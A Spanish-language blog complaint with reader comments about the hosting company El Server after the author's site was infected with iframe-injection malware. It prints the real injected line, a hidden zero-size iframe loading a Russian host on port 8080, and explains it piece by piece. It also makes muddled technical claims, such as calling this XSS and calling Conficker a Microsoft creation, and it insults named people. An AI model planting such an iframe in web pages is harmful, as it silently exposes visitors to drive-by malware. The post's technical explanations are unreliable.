El Server: Pesimo Servicio

La línea de historia de un servicio que no me duro ni un año...
El Server.com, atrae usuarios con su política de Distribución de contenidos, promociones a clientes duplicando el espacio y una supuesta tecnología Grid, que no la tienen, y además no tienen servidores propios, alquilan un Datacenter para almacenar a los clientes.

En primer lugar quiero aclarar que, acordamos el abono mensual de Hosting por debito automático y el dominio al contado por PagoFacil. Me enviaron la factura para imprimir del primer mes de hosting y no la del dominio, que igualmente me la habilitaron, y el debito comenzó a partir del segundo mes.
Con este comienzo, ustedes se darán cuenta de la pésima organización y administración que llevan los pendejos de Joel Alan Chornik y compañía.

A fines de Agosto llame por teléfono para saber que problema había porque no podía acceder a mi servidor por FTP, me pidieron que les envíe por el mail de soporte los datos de acceso para ver si pueden entrar…se los envíe, confié en su seguridad y responsabilidad…y pude entrar.

Después de un viaje, 15 días después intente acceder por FTP, el mismo problema, y encima al entrar a mi Sitio el AVG 8.5 me advirtió del virus HTML/Framer, me canse de llamar por dos días consecutivos y no me atendían, cuando lo hacían me volvían a pedir los datos de acceso o que me comunique con soporte, el puto soporte que no existe, si ellos no están trabajando allí. Terminamos en una fuerte, controversial y escandalosa discusión por el problema surgido.

El Virus
El maldito virus es una explotación de archivo en html que incluye otro archivo html, mediante la etiqueta Include, que incluye una pagina dentro de la misma, de manera invisible.

El Sitio fue victima de un ataque llamado XSS Directo, el Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. Según en la Wikipedia funciona localizando puntos débiles en la programación de los filtros de HTML, para publicar contenido (como blogs, foros, etc.). En este caso un Sitio Web invisible.

Normalmente el atacante tratara de insertar tags como <iframe>, o <script>, pero en caso de fallar, el atacante puede tratar de poner tags que casi siempre están permitidas y es poco conocida su capacidad de ejecutar código. De esta forma el atacante podría ejecutar código malicioso.

El código entro y se permaneció inerte afectando todos los PC clientes que visitaran mi sitio, incluido el servidor mismo en donde estaba alojado (un gran punto en contra del El Server)

El Código
La línea de código que ejecuta el comando iframe es de un falso sitio de Renault de origen ruso, que me conectaba al puerto 8080. Este código es el siguiente:

<div style="display:none"><iframe src=http://red-wolf.ru:8080/index. php width= "0" height= "0" scrolling="auto" frameborder= "1" transparency></iframe></div>

Analizando el comportamiento del código, se representa de la siguiente manera:
<div style="display:none">
Es la etiqueta DIV con el parametro de visualizacion del contenido de otra pagina web, en este caso esta deshabilitada

<iframe src=http://red-wolf.ru:8080/index.php
El Sitio web de comunicación en el puerto 8080, estableciendo una conexión remota

width= "0" height= "0" scrolling="auto" frameborder= "1" transparency>
El tamaño, el borde y el fondo transparente del sitio para que no se vea.

</iframe></div>
Cierre de ambas etiquetas

De esta manera cada PC que visitara mi sitio se conectaba al Sitio de los hijos, nietos y madres de re mil conteiner de prostitutas baratas rusos comunistas! Sin que el usuario lo supiera, si se tiene Firefox, Chrome o ningún antivirus bueno es presa fácil, convirtiéndose en un BootPC, conexión remota, o una PC Zoombie, dejando que el mercenario entrase a nuestros discos duros, al escritorio, a los documentos y hasta cualquier cosa que se conecte por USB.

Finalmente limpie mi maquina, elimine el virus y el gusano Confiker realizado por Microsoft que se filtro y por WebFTP borre todos mis archivos del Sitio y me di de baja al hosting.

Tomen bien en cuenta y conozcan todos los casos de éxito y fracaso de todos los hosting antes de contratar a uno.

Hola Siriö, gracias por compartir tu experiencia.. hay que cuidarse mucho y ver la mayor cantidad de posibilidades antes de contratar un servicio de hosting, aunque siendo sinceros.. yo NUNCA compraria en un hosting que se llamase "El server"

Hola buenas tardes , con respecto al tema del iframe injection se trata aparentemente de un virus que infecta la pc que publica via ftp los archivos del sitio, el virus puede llamarse HTML/Dldr.Iframe.CS o alguna de sus variantes o tambien puede ser detectado PHP.RSTBackdoor
en el siguiente link existe una herramienta para limpiarlo aparentemente pero no lo probe http://www.scanforfree.com/20/remove-trojan-win32-fraudpack-gen.html, en google busque asi para ver como removerlo
howto remove Dldr.Iframe variant
A veces no es el proveedor de hosting el culpable de los problemas de injeccion, pero si es un error el no buscar o aportar algun tipo de soporte, esto lo digo porque trabajo en una empresa de hosting y nos paso en 2 clientes a los cuales mas alla de en un primer momento no saber como lograban injectarle el codigo, investigamos un poco y logramos encontrar cual era el motivo.
aqui les transcribo un texto de una pagina que comenta que puede estar dentro de un archivo de adobe

dicen que puede estar en un archivo de adobe

t is an iframe virus.. ****.. hehe.. 5 link broken by it self.. iframe virus hide behind our adobe file.. at c/common files/adobe/activeX/AcoIEhelper.dll.. cant scan by antivirus.. so have to find it the hard way.. or use Hijackthis tools.. if u guys wan some virusdetection php on ur web ive got one.. dunno where to put it.. infusion or mods... cheers

y otra descripciondel trayano

HTML_IFRAME.AH
Monday, February 18, 2008

HTML_IFRAME.AH is a detection for malicious HyperText Markup Language (HTML) for Web pages that are compromised through the insertion of a certain IFRAME tag. It may be hosted on a Web site and run when a user accesses the said Web site.

Type: Trojan

Type Description:
Trojan horse program is not capable of automatically spreading itself to other systems. Trojans are usually downloaded from the Internet whether intentionally or by software vulnerabilities.

Symptoms:
-

How to Remove HTML_IFRAME.AH:
Please use the Typical Threat Removal. Click here

espero les sea de utilidad
Diego

Rándich:
Tienes razon Randich, en pricipio dude en contratarlos, pero solo me convencio la capacidad de 25 Gb que tienen, fue en marzo cuando era el unico Hosting que brindaban esa capacidad, hoy Dattatec tiene un Plan de 25 Gb a solo $20 en Windows, añadiendo la calidad y la trayectoria de crecimiento continuo que tienen, encabezan la lista en el pais. Ahora estoy en Dattatec, y la atencion fue la de resolver mis problemas y no la de ofrecer su servicio, eso es un servicio!, pero claro, no creo que ningun otra empresa de Hosting tenga mas de 20 empleados, cada uno hace su tarea.

Host Cero:
Eres de los que se filtran para averiguar la competencia, y esta bueno porque ven en los demas los problemas que pueden tener y los solucionan, a mi me paso con la seguridad en mi web, hoy mismo se da el primer paso con este problema del maldito virus, aunque de verdad esa tarea la delego, no se quien se pondra las pilas con eso, ta que Gustavo R. Sepulcri, es que estava a cargo de Security Consultants se borro del mapa, la pagina web esta abandonada y el numero de telefono no existe, es como el hostel tango y toro en san telmo, son empresas fantasmas... estas cosas hay en este pais, asi les van.

Con respecto al virus, lo estuve investigando como si fuera un consultor de seguridad, en verdad ni me interesa, pero la cuestion es que supe como trabaja y de que manera se puede solucionar, el archivo que me indicas es AcroIEhelper.dll, es un Adobe PDF Helper for Internet Explorer de Acrobat Reader 9, con un certificado aparentemente valido por VeriSign en RSA256 y vencimiento en el 2012. Es un módulo que ofrece la ayuda para el programa del programa de lectura de Adobe Acrobat.
Analizado con AVG 8.5 no encontro nada, con Agnitum 2009 tampoco ni con Spybot, ya que no representa un problema en si mismo. No habia pasado nada hasta que le brinde por mail mis datos de acceso, obvio, se interceptan mensajes de correo como conversaciones privadas en Chat por agencias del gobierno para verificar supuestas celulas terroristas que al fin y al cabo ya no existen. Una vez que pude entrar no toque ningun index.html, el archivo infectado, solo borre los archivos del Sitio de prueba en otra carpeta, asi que desde mi PC no hay infecciones, tengo el AVG, Spybot y Agnitum Outpost con reglas controladas, como veran tengo muy buena seguridad en el cliente, si el servidor no tiene la suficiente seguridad, no hay mal que por bien no venga, solo hace falta colaborar con los Hosting para brindarles seguridad, Con Softwares, donar un IPS, o como sea, estoy pensando seriamente en pasarme en un dedicado, asi manejo todas mis cuentas, mis Sitios con dominios diferentes y tengo un absoluto control del alojamiento.

te comento , no corremos servidores windows por tal motivo creo que el problema debe estar en el cliente que publica , no contemple el hosting windows, que ahi no puedo opinar porque no lo ofrecemos, pero si,el primer post me dio la pauta para buscar un poco mas enfocado, y por feddback del cliente su maquina estaba infectada con el virus y una ves removido no le aparecieron mas las modificaciones, no me filtro como comentas, solo al leer tu post me parecio bueno responderte o dar mi punto de vista a lo averguado, ya que esta bueno que al encontrar los problema que surgen se comparta la informacion.

saludos